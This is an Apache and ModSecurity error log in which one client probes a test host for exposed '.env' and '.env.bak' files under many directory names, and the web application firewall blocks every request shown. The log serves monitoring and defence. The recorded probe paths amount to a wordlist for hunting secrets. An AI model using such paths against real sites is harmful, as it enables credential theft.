[Wed Dec 10 17:36:44.278680 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aTmhnKNE19-36a8V4yFQ7AAAAAc"]
[Wed Dec 10 17:36:44.329084 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aTmhnKNE19-36a8V4yFQ7QAAAAc"]
[Wed Dec 10 17:36:44.329313 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aTmhnKNE19-36a8V4yFQ7QAAAAc"]
[Wed Dec 10 17:36:44.329516 2025] [:error] [pid 637201] [client 45.148.10.247:55874] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aTmhnKNE19-36a8V4yFQ7QAAAAc"]
[Wed Dec 10 17:36:44.463895 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeobwAAAAI"]
[Wed Dec 10 17:36:44.464141 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeobwAAAAI"]
[Wed Dec 10 17:36:44.464311 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeobwAAAAI"]
[Wed Dec 10 17:36:44.551304 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeocAAAAAI"]
[Wed Dec 10 17:36:44.551544 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeocAAAAAI"]
[Wed Dec 10 17:36:44.551737 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeocAAAAAI"]
[Wed Dec 10 17:36:44.643293 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeocQAAAAI"]
[Wed Dec 10 17:36:44.643673 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeocQAAAAI"]
[Wed Dec 10 17:36:44.644070 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeocQAAAAI"]
[Wed Dec 10 17:36:44.739525 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeocgAAAAI"]
[Wed Dec 10 17:36:44.739868 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeocgAAAAI"]
[Wed Dec 10 17:36:44.740135 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeocgAAAAI"]
[Wed Dec 10 17:36:44.814779 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeocwAAAAI"]
[Wed Dec 10 17:36:44.815013 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeocwAAAAI"]
[Wed Dec 10 17:36:44.815210 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeocwAAAAI"]
[Wed Dec 10 17:36:44.927253 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeodAAAAAI"]
[Wed Dec 10 17:36:44.927491 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeodAAAAAI"]
[Wed Dec 10 17:36:44.927704 2025] [:error] [pid 642267] [client 45.148.10.247:55876] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aTmhnOZ0wa7AiKX8edeodAAAAAI"]
[Wed Dec 10 17:36:45.796915 2025] [authz_core:error] [pid 637203] [client 45.148.10.247:55880] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Wed Dec 10 17:36:48.063666 2025] [:error] [pid 636936] [client 45.148.10.247:44336] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aTmhoCj7S3f8o0DuYfxztAAAAAE"]
[Wed Dec 10 17:36:48.063936 2025] [:error] [pid 636936] [client 45.148.10.247:44336] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aTmhoCj7S3f8o0DuYfxztAAAAAE"]
[Wed Dec 10 17:36:48.064136 2025] [:error] [pid 636936] [client 45.148.10.247:44336] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aTmhoCj7S3f8o0DuYfxztAAAAAE"]
[Wed Dec 10 17:36:48.259798 2025] [:error] [pid 636939] [client 45.148.10.247:44352] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aTmhoLCnovWtbeVvHnHXtwAAAAQ"]
[Wed Dec 10 17:36:48.260029 2025] [:error] [pid 636939] [client 45.148.10.247:44352] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aTmhoLCnovWtbeVvHnHXtwAAAAQ"]
[Wed Dec 10 17:36:48.260207 2025] [:error] [pid 636939] [client 45.148.10.247:44352] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aTmhoLCnovWtbeVvHnHXtwAAAAQ"]
[Wed Dec 10 17:36:48.283134 2025] [:error] [pid 636939] [client 45.148.10.247:44352] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTmhoLCnovWtbeVvHnHXuAAAAAQ"]
[Wed Dec 10 17:36:48.283388 2025] [:error] [pid 636939] [client 45.148.10.247:44352] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTmhoLCnovWtbeVvHnHXuAAAAAQ"]
[Wed Dec 10 17:36:48.283595 2025] [:error] [pid 636939] [client 45.148.10.247:44352] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTmhoLCnovWtbeVvHnHXuAAAAAQ"]
[Wed Dec 10 17:36:48.358422 2025] [:error] [pid 642280] [client 45.148.10.247:44360] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aTmhoBSjobP9P3N0EgkcRwAAAAk"]
[Wed Dec 10 17:36:48.358653 2025] [:error] [pid 642280] [client 45.148.10.247:44360] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aTmhoBSjobP9P3N0EgkcRwAAAAk"]
[Wed Dec 10 17:36:48.358815 2025] [:error] [pid 642280] [client 45.148.10.247:44360] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aTmhoBSjobP9P3N0EgkcRwAAAAk"]
[Wed Dec 10 17:36:48.411444 2025] [:error] [pid 642280] [client 45.148.10.247:44360] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aTmhoBSjobP9P3N0EgkcSAAAAAk"]
[Wed Dec 10 17:36:48.411682 2025] [:error] [pid 642280] [client 45.148.10.247:44360] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aTmhoBSjobP9P3N0EgkcSAAAAAk"]
[Wed Dec 10 17:36:48.411884 2025] [:error] [pid 642280] [client 45.148.10.247:44360] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aTmhoBSjobP9P3N0EgkcSAAAAAk"]
[Wed Dec 10 17:36:52.930066 2025] [:error] [pid 636951] [client 45.148.10.247:44378] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aTmhpNk209adLJ1hacVSrQAAAAU"]
[Wed Dec 10 17:36:52.930300 2025] [:error] [pid 636951] [client 45.148.10.247:44378] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aTmhpNk209adLJ1hacVSrQAAAAU"]
[Wed Dec 10 17:36:52.930528 2025] [:error] [pid 636951] [client 45.148.10.247:44378] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aTmhpNk209adLJ1hacVSrQAAAAU"]
